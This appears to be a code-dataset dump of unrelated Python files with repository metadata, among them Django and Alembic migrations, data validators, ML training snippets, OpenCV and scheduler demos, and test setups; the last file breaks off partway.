"render_icon": "wysihtml5.widgets.render_changeView_icon"
},
}
# This is necessary to protect the field of content in cases where
# the user disables JavaScript in the browser, so that Wysihtml5 can't
# do the filter job.
WYSIHTML5_ALLOWED_TAGS = ('h1 h2 h3 h4 h5 h6 div p b i u'
' ul ol li span img a blockquote')
| 36.787879 | 76 | 0.635914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,570 | 0.735173 |
395a96908738ec18c9180da4437fee979a2a2992 | 6,496 | py | Python | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 14 | 2016-09-22T10:10:01.000Z | 2020-09-23T11:40:37.000Z | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 159 | 2016-09-22T11:08:46.000Z | 2021-09-29T13:55:52.000Z | protocols/migration/migration_participant_100_to_reports_300.py | Lucioric2000/GelReportModels | 1704cdea3242d5b46c8b81ef46553ccae2799435 | [
"Apache-2.0"
] | 17 | 2016-09-20T13:31:58.000Z | 2020-10-19T04:58:19.000Z | from protocols import reports_3_0_0 as participant_old
from protocols import participant_1_0_0
from protocols.migration import BaseMigration
class MigrationParticipants100ToReports(BaseMigration):
old_model = participant_1_0_0
new_model = participant_old
def migrate_pedigree(self, old_instance):
"""
:param old_instance: org.gel.models.participant.avro.Pedigree 1.0.0
:rtype: org.gel.models.report.avro RDParticipant.Pedigree 3.0.0
"""
new_instance = self.convert_class(self.new_model.Pedigree, old_instance)
new_instance.versionControl = self.new_model.VersionControl()
new_instance.gelFamilyId = old_instance.familyId
new_instance.participants = self.convert_collection(
old_instance.members, self._migrate_member_to_participant, family_id=old_instance.familyId)
return self.validate_object(object_to_validate=new_instance, object_type=self.new_model.Pedigree)
def _migrate_member_to_participant(self, old_member, family_id):
new_instance = self.convert_class(self.new_model.RDParticipant, old_member)
new_instance.gelFamilyId = family_id
new_instance.pedigreeId = old_member.pedigreeId or 0
new_instance.isProband = old_member.isProband or False
new_instance.gelId = old_member.participantId
new_instance.sex = self._migrate_sex(old_sex=old_member.sex)
new_instance.personKaryotipicSex = self._migrate_person_karyotypic_sex(old_pks=old_member.personKaryotypicSex)
if old_member.yearOfBirth is not None:
new_instance.yearOfBirth = str(old_member.yearOfBirth)
new_instance.adoptedStatus = self._migrate_adopted_status(old_status=old_member.adoptedStatus)
new_instance.lifeStatus = self._migrate_life_status(old_status=old_member.lifeStatus)
new_instance.affectionStatus = self._migrate_affection_status(old_status=old_member.affectionStatus)
new_instance.hpoTermList = self.convert_collection(
old_member.hpoTermList, self._migrate_hpo_term, default=[])
new_instance.samples = self.convert_collection(old_member.samples, lambda s: s .sampleId)
new_instance.versionControl = self.new_model.VersionControl()
if old_member.consentStatus is None:
new_instance.consentStatus = self.new_model.ConsentStatus(
programmeConsent=True, primaryFindingConsent=True, secondaryFindingConsent=True,
carrierStatusConsent=True
)
if old_member.ancestries is None:
new_instance.ancestries = self.new_model.Ancestries()
if old_member.consanguineousParents is None:
new_instance.consanguineousParents = self.new_model.TernaryOption.unknown
if new_instance.disorderList is None:
new_instance.disorderList = []
return new_instance
def _migrate_hpo_term(self, old_term):
new_instance = self.convert_class(target_klass=self.new_model.HpoTerm, instance=old_term) # type: self.new_model.HpoTerm
new_instance.termPresence = self._migrate_ternary_option_to_boolean(ternary_option=old_term.termPresence)
return new_instance
def _migrate_ternary_option_to_boolean(self, ternary_option):
ternary_map = {
self.old_model.TernaryOption.no: False,
self.old_model.TernaryOption.yes: True,
}
return ternary_map.get(ternary_option, None)
def _migrate_affection_status(self, old_status):
status_map = {
self.old_model.AffectionStatus.AFFECTED: self.new_model.AffectionStatus.affected,
self.old_model.AffectionStatus.UNAFFECTED: self.new_model.AffectionStatus.unaffected,
self.old_model.AffectionStatus.UNCERTAIN: self.new_model.AffectionStatus.unknown,
}
return status_map.get(old_status, self.new_model.AffectionStatus.unknown)
def _migrate_life_status(self, old_status):
status_map = {
self.old_model.LifeStatus.ABORTED: self.new_model.LifeStatus.aborted,
self.old_model.LifeStatus.ALIVE: self.new_model.LifeStatus.alive,
self.old_model.LifeStatus.DECEASED: self.new_model.LifeStatus.deceased,
self.old_model.LifeStatus.UNBORN: self.new_model.LifeStatus.unborn,
self.old_model.LifeStatus.STILLBORN: self.new_model.LifeStatus.stillborn,
self.old_model.LifeStatus.MISCARRIAGE: self.new_model.LifeStatus.miscarriage,
}
return status_map.get(old_status, self.new_model.LifeStatus.alive)
def _migrate_adopted_status(self, old_status):
status_map = {
self.old_model.AdoptedStatus.notadopted: self.new_model.AdoptedStatus.not_adopted,
self.old_model.AdoptedStatus.adoptedin: self.new_model.AdoptedStatus.adoptedin,
self.old_model.AdoptedStatus.adoptedout: self.new_model.AdoptedStatus.adoptedout,
}
return status_map.get(old_status, self.new_model.AdoptedStatus.not_adopted)
def _migrate_person_karyotypic_sex(self, old_pks):
pks_map = {
self.old_model.PersonKaryotipicSex.UNKNOWN: self.new_model.PersonKaryotipicSex.unknown,
self.old_model.PersonKaryotipicSex.XX: self.new_model.PersonKaryotipicSex.XX,
self.old_model.PersonKaryotipicSex.XY: self.new_model.PersonKaryotipicSex.XY,
self.old_model.PersonKaryotipicSex.XO: self.new_model.PersonKaryotipicSex.XO,
self.old_model.PersonKaryotipicSex.XXY: self.new_model.PersonKaryotipicSex.XXY,
self.old_model.PersonKaryotipicSex.XXX: self.new_model.PersonKaryotipicSex.XXX,
self.old_model.PersonKaryotipicSex.XXYY: self.new_model.PersonKaryotipicSex.XXYY,
self.old_model.PersonKaryotipicSex.XXXY: self.new_model.PersonKaryotipicSex.XXXY,
self.old_model.PersonKaryotipicSex.XXXX: self.new_model.PersonKaryotipicSex.XXXX,
self.old_model.PersonKaryotipicSex.XYY: self.new_model.PersonKaryotipicSex.XYY,
self.old_model.PersonKaryotipicSex.OTHER: self.new_model.PersonKaryotipicSex.other,
}
return pks_map.get(old_pks)
def _migrate_sex(self, old_sex):
sex_map = {
self.old_model.Sex.MALE: self.new_model.Sex.male,
self.old_model.Sex.FEMALE: self.new_model.Sex.female,
self.old_model.Sex.UNKNOWN: self.new_model.Sex.unknown,
}
return sex_map.get(old_sex, self.new_model.Sex.undetermined)
| 56.982456 | 129 | 0.736761 | 6,352 | 0.977833 | 0 | 0 | 0 | 0 | 0 | 0 | 193 | 0.029711 |
395b088785153a0b12425d78d2c97981d28c0b99 | 584 | py | Python | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 10 | 2015-05-28T18:26:40.000Z | 2021-09-06T10:07:03.000Z | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 762 | 2015-01-15T10:00:59.000Z | 2022-03-31T15:35:14.000Z | bluebottle/test/factory_models/pages.py | terrameijar/bluebottle | b4f5ba9c4f03e678fdd36091b29240307ea69ffd | [
"BSD-3-Clause"
] | 9 | 2015-02-20T13:19:30.000Z | 2022-03-08T14:09:17.000Z | from builtins import object
from datetime import timedelta
import factory
from django.utils.timezone import now
from bluebottle.pages.models import Page
from .accounts import BlueBottleUserFactory
class PageFactory(factory.DjangoModelFactory):
class Meta(object):
model = Page
language = 'en'
title = factory.Sequence(lambda n: 'Page Title {0}'.format(n))
author = factory.SubFactory(BlueBottleUserFactory)
slug = factory.Sequence(lambda n: 'slug-{0}'.format(n))
status = Page.PageStatus.published
publication_date = now() - timedelta(days=4)
| 27.809524 | 66 | 0.741438 | 382 | 0.65411 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.05137 |
395bc11ce97e1bb26dff3ffa2dd8e88c133704f6 | 2,403 | py | Python | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 25 | 2022-03-05T08:26:52.000Z | 2022-03-30T15:45:42.000Z | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 219 | 2022-03-04T17:29:12.000Z | 2022-03-31T21:16:14.000Z | ietf/ipr/migrations/0007_create_ipr_doc_events.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 22 | 2022-03-04T15:34:34.000Z | 2022-03-28T13:30:59.000Z | # Copyright The IETF Trust 2020, All Rights Reserved
# -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-01-17 12:32
from django.db import migrations
def create_or_delete_ipr_doc_events(apps, delete=False):
"""Create or delete DocEvents for IprEvents
Mostly duplicates IprEvent.create_doc_events(). This is necessary
because model methods, including custom save() methods, are not
available to migrations.
"""
IprEvent = apps.get_model('ipr', 'IprEvent')
DocEvent = apps.get_model('doc', 'DocEvent')
# Map from self.type_id to DocEvent.EVENT_TYPES for types that
# should be logged as DocEvents
event_type_map = {
'posted': 'posted_related_ipr',
'removed': 'removed_related_ipr',
}
for ipr_event in IprEvent.objects.filter(type_id__in=event_type_map):
related_docs = set() # related docs, no duplicates
for alias in ipr_event.disclosure.docs.all():
related_docs.update(alias.docs.all())
for doc in related_docs:
kwargs = dict(
type=event_type_map[ipr_event.type_id],
time=ipr_event.time,
by=ipr_event.by,
doc=doc,
rev='',
desc='%s related IPR disclosure: <b>%s</b>' % (ipr_event.type.name,
ipr_event.disclosure.title),
)
events = DocEvent.objects.filter(**kwargs) # get existing events
if delete:
events.delete()
elif len(events) == 0:
DocEvent.objects.create(**kwargs) # create if did not exist
def forward(apps, schema_editor):
"""Create a DocEvent for each 'posted' or 'removed' IprEvent"""
create_or_delete_ipr_doc_events(apps, delete=False)
def reverse(apps, schema_editor):
"""Delete DocEvents that would be created by the forward migration
This removes data, but only data that can be regenerated by running
the forward migration.
"""
create_or_delete_ipr_doc_events(apps, delete=True)
class Migration(migrations.Migration):
dependencies = [
('ipr', '0006_document_primary_key_cleanup'),
# Ensure the DocEvent types we need exist
('doc', '0029_add_ipr_event_types'),
]
operations = [
migrations.RunPython(forward, reverse),
]
| 34.826087 | 91 | 0.62422 | 289 | 0.120266 | 0 | 0 | 0 | 0 | 0 | 0 | 997 | 0.414898 |
395f29ec9cf26aad90082c0bbf20534ee8f84d4b | 788 | py | Python | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | getting_setting.py | madhurgupta96/Image-Fundamentals-with-OpenCV | 890fcce30155e98ab66e206c3511d77040570ec5 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 15 23:52:04 2020
@author: Madhur Gupta
"""
from __future__ import print_function
import cv2
import argparse
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='path to image')
args=vars(ap.parse_args())
image=cv2.imread(args['image'])
cv2.imshow("Original", image)
#setting 0,0 as red pixel
(b,g,r)=image[0,0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
image[0, 0] = (0, 0, 255)
(b, g, r) = image[0, 0]
print("Pixel at (0, 0) - Red: {}, Green: {}, Blue: {}".format(r,g, b))
#setting the corner of image as green
corner=image[0:100,0:100]
cv2.imshow('corner',corner)
image[0:100,0:100]=(0,255,0)
cv2.imshow('Updated',image)
cv2.waitKey(0)
| 22.514286 | 71 | 0.619289 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 316 | 0.401015 |
395f4cf60fb9e63158d7823964bdae4a063e3899 | 665 | py | Python | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 163 | 2015-01-24T06:17:34.000Z | 2021-12-17T22:58:46.000Z | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 86 | 2015-01-01T00:22:57.000Z | 2022-03-02T14:50:59.000Z | zk_shell/tests/test_acl_reader.py | sellers/zk_shell | 5f5972c4362212f97de91a75e44d2a551c7bcd51 | [
"Apache-2.0"
] | 32 | 2015-02-18T17:33:16.000Z | 2021-12-28T03:43:45.000Z | # -*- coding: utf-8 -*-
""" ACLReader test cases """
import unittest
from kazoo.security import ACL, Id
from zk_shell.acl import ACLReader
class ACLReaderTestCase(unittest.TestCase):
""" test watcher """
def test_extract_acl(self):
acl = ACLReader.extract_acl('world:anyone:cdrwa')
expected = ACL(perms=31, id=Id(scheme='world', id='anyone'))
self.assertEqual(expected, acl)
def test_username_password(self):
acl = ACLReader.extract_acl('username_password:user:secret:cdrwa')
expected = ACL(perms=31, id=Id(scheme='digest', id=u'user:5w9W4eL3797Y4Wq8AcKUPPk8ha4='))
self.assertEqual(expected, acl)
| 28.913043 | 97 | 0.685714 | 519 | 0.780451 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.281203 |
395f821293e57d64e71d8ac788f63dcdb5e4e300 | 3,815 | py | Python | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | dictator/validators/base.py | brunosmmm/dictator | 60314734b9d0c378fad77d296c8946165f372400 | [
"MIT"
] | null | null | null | """Base validators."""
import re
from dictator.errors import ValidationError
from dictator.validators import Validator
from typing import Type, Callable, Any, Tuple, Union
HEX_REGEX = re.compile(r"^(0x)?([0-9A-Fa-f]+)$")
BIN_REGEX = re.compile(r"^(0b)?([0-1]+)$")
class ValidateType(Validator):
"""Type validator.
Validates if an object is from a certain Python type.
"""
_DEFAULT_NAME = "type"
def __init__(self, *_types: Type):
"""Initialize.
Parameters
----------
type
The expected python type
"""
super().__init__()
self._types = _types
@property
def target_types(self) -> Tuple[Type, ...]:
"""Get target type."""
return self._types
def validate(self, _value, **kwargs):
"""Perform validation."""
if not isinstance(_value, self.target_types):
raise ValidationError(f"value has unexpected type")
return _value
class ValidatorFactory(Validator):
"""Validator factory.
Create a validator class from a validation function.
"""
def __init__(self, validate_fn: Union[Callable, Validator], **kwargs):
"""Initialize.
Parameters
----------
validate_fn
Some callable that performs actual validation
"""
super().__init__(**kwargs)
if not callable(validate_fn):
raise TypeError("validate_fn must be callable")
if isinstance(validate_fn, Validator):
self._validatefn = validate_fn.validate
else:
self._validatefn = validate_fn
def validate(self, _value, **kwargs):
"""Perform validation."""
return self._validatefn(_value, **kwargs)
def _validate_integer(_value: Any, **kwargs: Any) -> int:
"""Validate integer value.
Parameters
----------
_value
Some value
kwargs
Other metadata
"""
if isinstance(_value, str):
# try converting
h = HEX_REGEX.match(_value)
b = BIN_REGEX.match(_value)
if h is not None:
if h.group(1) is None and b is not None:
# is actually binary
return int(h.group(2), 2)
return int(h.group(2), 16)
raise ValidationError("cannot validate as integer")
elif isinstance(_value, bool):
raise ValidationError("cannot validate as integer, got boolean")
elif isinstance(_value, int):
return _value
raise ValidationError("cannot validate as integer")
validate_string = ValidatorFactory(ValidateType(str))
validate_list = ValidatorFactory(ValidateType(tuple, list))
validate_dict = ValidatorFactory(ValidateType(dict))
validate_boolean = ValidatorFactory(ValidateType(bool))
validate_float = ValidatorFactory(ValidateType(float))
validate_integer = ValidatorFactory(_validate_integer)
validate_string_pre = ValidatorFactory(ValidateType(str), after_fn=False)
validate_list_pre = ValidatorFactory(ValidateType(tuple, list), after_fn=False)
validate_dict_pre = ValidatorFactory(ValidateType(dict), after_fn=False)
validate_boolean_pre = ValidatorFactory(ValidateType(bool), after_fn=False)
validate_float_pre = ValidatorFactory(ValidateType(float), after_fn=False)
validate_integer_pre = ValidatorFactory(_validate_integer, after_fn=False)
def validate_null(_value: Any, **kwargs: Any) -> None:
"""Validate null value.
Parameters
---------
_value
Some value
kwargs
Other metadata
"""
if _value is not None:
raise ValidationError("value is not null")
return _value
DEFAULT_VALIDATOR_BY_TYPE = {
int: validate_integer,
str: validate_string,
list: validate_list,
dict: validate_dict,
bool: validate_boolean,
float: validate_float,
}
| 27.644928 | 79 | 0.654522 | 1,477 | 0.387156 | 0 | 0 | 115 | 0.030144 | 0 | 0 | 1,036 | 0.27156 |
3960d947244ab5cacdb399b505a02597c36f0c4b | 554 | py | Python | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | copasi_test/ReportParserMoieties.py | copasi/python-copasi-testsuite | 604ce52f95b4a0e2631712b22c331cd8c263bd05 | [
"Artistic-2.0"
] | null | null | null | from .ReportParser import ReportParser
class ReportParserMoieties(ReportParser):
def __init__(self):
ReportParser.__init__(self)
def parseLines(self, lines):
# type: ([str]) -> None
current = self.skip_until(lines, 0, 'Link matrix(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
current = self.skip_until(lines, current, 'Stoichiometry(ann)')
if current == -1:
return
current = self.readAnnotatedMatrix(lines, current)
| 29.157895 | 71 | 0.628159 | 512 | 0.924188 | 0 | 0 | 0 | 0 | 0 | 0 | 61 | 0.110108 |
396297e39e5a9bcc3e2b8459e2edf7a1785fe3e7 | 1,575 | py | Python | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | models/networks/recurrent/encoder.py | jamesoneill12/LayerFusion | 99cba1030ed8c012a453bc7715830fc99fb980dc | [
"Apache-2.0"
] | null | null | null | import torch.nn as nn
import torch
class EncoderRNN(nn.Module):
def __init__(self, vocab_size, hidden_size, nlayers=2):
super(EncoderRNN, self).__init__()
self.nlayers = nlayers
self.hidden_size = hidden_size
self.embedding = nn.Embedding(vocab_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, num_layers=nlayers)
def forward(self, input, hidden):
input = self.embedding(input)
output, hidden = self.gru(input, hidden)
return output, hidden
def initHidden(self, bsz):
#weight = next(self.parameters())
#return weight.new_zeros(self.nlayers, bsz, self.hidden_size)
#return Variable(torch.randn(self.nlayers, bsz, self.hidden_size, device='cuda'), requires_grad=True)
return torch.zeros(self.nlayers, bsz, self.hidden_size, device='cuda')
"""
# use this one when not doing multi-task learning as a baseline
class EncoderRNN(nn.Module):
def __init__(self, input_size, hidden_size, nlayers=2):
super(EncoderRNN, self).__init__()
self.nlayers = nlayers
self.hidden_size = hidden_size
self.embedding = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, nlayers)
def forward(self, input, hidden):
embedded = self.embedding(input).view(1, 1, -1)
output = embedded
output, hidden = self.gru(output, hidden)
return output, hidden
def initHidden(self, bsz):
return torch.zeros(self.nlayers, bsz, self.hidden_size, device='gpu')
"""
| 35 | 109 | 0.670476 | 826 | 0.524444 | 0 | 0 | 0 | 0 | 0 | 0 | 909 | 0.577143 |
396309f795615e199934ec29198bf8e06add077e | 1,087 | py | Python | relationship_classifiction/test.py | suolyer/PyTorch_BERT_Pipeline_IE | 869a1fc937e268a565f5b30a2105a460b4e07f59 | [
"MIT"
] | 8 | 2021-05-23T02:04:09.000Z | 2022-01-14T08:58:42.000Z | relationship_classifiction/test.py | 2019hong/PyTorch_BERT_Pipeline_IE | 9ee66bc9ceaed42e996e9b2414612de3fc0b23bb | [
"MIT"
] | 2 | 2021-05-14T00:34:45.000Z | 2021-08-08T08:36:33.000Z | relationship_classifiction/test.py | 2019hong/PyTorch_BERT_Pipeline_IE | 9ee66bc9ceaed42e996e9b2414612de3fc0b23bb | [
"MIT"
] | 1 | 2021-09-28T15:15:44.000Z | 2021-09-28T15:15:44.000Z |
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import CosineAnnealingLR, CosineAnnealingWarmRestarts
import itertools
import matplotlib.pyplot as plt
initial_lr = 0.1
class model(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3)
def forward(self, x):
pass
net_1 = model()
optimizer_1 = torch.optim.Adam(net_1.parameters(), lr=initial_lr)
scheduler_1 = CosineAnnealingWarmRestarts(optimizer_1, T_0=1)
print("初始化的学习率:", optimizer_1.defaults['lr'])
lr_list = [] # 把使用过的lr都保存下来,之后画出它的变化
for epoch in range(0, 6):
# train
for i in range(int(30000/32)):
optimizer_1.zero_grad()
optimizer_1.step()
print("第%d个epoch的学习率:%f" % (epoch, optimizer_1.param_groups[0]['lr']))
lr_list.append(optimizer_1.param_groups[0]['lr'])
scheduler_1.step((epoch+i+1)/int(30000/32))
# 画出lr的变化
plt.plot(lr_list)
plt.xlabel("epoch")
plt.ylabel("lr")
plt.title("learning rate's curve changes as epoch goes on!")
plt.show()
| 24.155556 | 83 | 0.689052 | 192 | 0.164807 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.186266 |
39637ce1898c8dbfd20a89d25579fc15ae6c2bcd | 432 | py | Python | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | null | null | null | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | 8 | 2021-04-08T21:57:55.000Z | 2022-03-12T00:50:38.000Z | events_calendar/urls.py | mkbeh/Site-Nordic-Walking- | ba98f41db09ed448ecc4db175f65ef4fa2d64979 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import events_calendar, calendar_event_detail, past_competitions
app_name = 'events_calendar'
urlpatterns = [
path('past_competitions/', past_competitions, name='past_competitions'),
path('<int:year>/<int:month>/<int:day>/<int:hour>/<slug:event>/',
calendar_event_detail, name='calendar_event_detail'),
path('<int:days>', events_calendar, name='events_calendar'),
]
| 30.857143 | 76 | 0.733796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.386574 |
39642b71284a9db7523df49c8dca22286f61d556 | 1,236 | py | Python | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 32 | 2019-12-06T19:23:51.000Z | 2022-03-08T06:08:58.000Z | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 2 | 2020-02-20T11:04:07.000Z | 2020-03-12T08:47:54.000Z | examples/linear_regression/01_linear_regression.py | zhaoshiying97/trading_gym | d4af8d724efa17420e6ebb430f6f9d4f08c6f83a | [
"Apache-2.0"
] | 15 | 2019-12-12T07:43:34.000Z | 2022-03-06T13:02:39.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pdb
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from trading_gym.utils.data.toy import create_toy_data
from trading_gym.envs.portfolio_gym.portfolio_gym import PortfolioTradingGym
order_book_id_number = 100
toy_data = create_toy_data(order_book_ids_number=order_book_id_number, feature_number=10, start="2019-05-01", end="2019-12-12", frequency="D")
env = PortfolioTradingGym(data_df=toy_data, sequence_window=1, add_cash=False)
state = env.reset()
while True:
next_state, reward, done, info = env.step(action=None)
label = info["one_step_fwd_returns"]
print(state)
print(label)
#
regressor = LinearRegression()
regressor.fit(state.values, label.values)
#display and store
print(regressor.coef_)
env.experience_buffer["coef"].append(regressor.coef_)
#
if done:
break
else:
state = next_state
#
factor_returns = pd.DataFrame(np.array(env.experience_buffer["coef"]), index=env.experience_buffer["dt"], columns=toy_data.columns[:-1])
cum_factor_returns = (factor_returns +1).cumprod()
cum_factor_returns.plot(title="Cumulative Factor Return",linewidth=2.2)
| 30.9 | 142 | 0.741909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 157 | 0.127023 |
3965e8f70ee4cbba8c4a1ffa659f82e9962bbdcf | 619 | py | Python | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | migrations/versions/6f98e24760d_session_speaker.py | jace/goafunnel | 5ff25f0e6a247ff1f6e87fce2a793d1775476cc0 | [
"BSD-2-Clause"
] | null | null | null | """session speaker
Revision ID: 6f98e24760d
Revises: 58588eba8cb8
Create Date: 2013-11-22 17:28:47.751025
"""
# revision identifiers, used by Alembic.
revision = '6f98e24760d'
down_revision = '58588eba8cb8'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('session', sa.Column('speaker', sa.Unicode(length=200), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('session', 'speaker')
### end Alembic commands ###
| 22.925926 | 89 | 0.6979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 388 | 0.626817 |
39671833a02d25c6d6b9a61a074e54f03e6112e8 | 1,124 | py | Python | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | decision_tree/dt_author_id.py | ncfausti/udacity-machine-learning | 223eb1821e739d048d278629a2e466b3f2af8912 | [
"MIT"
] | null | null | null | #!/usr/bin/python
"""
this is the code to accompany the Lesson 3 (decision tree) mini-project
use an DT to identify emails from the Enron corpus by their authors
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
from sklearn import tree
from sklearn.metrics import accuracy_score
import time
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
clf = tree.DecisionTreeClassifier(min_samples_split = 40)
clf = clf.fit(features_train, labels_train)
prediction = clf.predict(features_test)
accuracy = accuracy_score(prediction, labels_test)
print("Accuracy: %.6f" % accuracy)
print("Feature length: %d" % len(features_train[0]))
#########################################################
### your code goes here ###
#########################################################
def running_time():
pass | 24.434783 | 75 | 0.674377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 585 | 0.520463 |
3968419bade051f1706f219d6c57e614a8cbfb88 | 49,588 | py | Python | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2022-01-14T06:37:42.000Z | 2022-01-14T06:37:42.000Z | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | climateeconomics/tests/_l1_test_energy_global_values.py | os-climate/witness-core | 3ef9a44d86804c5ad57deec3c9916348cb3bfbb8 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | '''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
Copyright (C) 2020 Airbus SAS
'''
import unittest
import time
import numpy as np
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from climateeconomics.sos_processes.iam.witness.witness_dev.usecase_witness import Study as Study_open
class TestGlobalEnergyValues(unittest.TestCase):
"""
    This test class checks the order of magnitude of some key values in the energy models for 2020.
All the data are taken either from ourworldindata:
Hannah Ritchie, Max Roser and Pablo Rosado (2020) - "Energy". Published online at OurWorldInData.org.
Retrieved from: 'https://ourworldindata.org/energy' [Online Resource]
Or from IEA:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
"""
def setUp(self):
'''
        Initialize the data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.name = 'Test'
self.energymixname = 'EnergyMix'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
builder = self.ee.factory.get_builder_from_process(
repo, 'witness_dev')
self.ee.factory.set_builders_to_coupling_builder(builder)
self.ee.configure()
usecase = Study_open(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
self.ee.display_treeview_nodes()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
self.ee.load_study_from_input_dict(full_values_dict)
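    # The assertions in this class repeatedly check that a computed value lies
    # within +/-10% of a reference value. The helper below is a minimal sketch
    # of that convention, added for clarity; it is not called by the original
    # tests.
    def _assert_within_tolerance(self, computed, reference, rel_tol=0.1):
        """Assert reference * (1 - rel_tol) <= computed <= reference * (1 + rel_tol)."""
        self.assertLessEqual(computed, reference * (1.0 + rel_tol))
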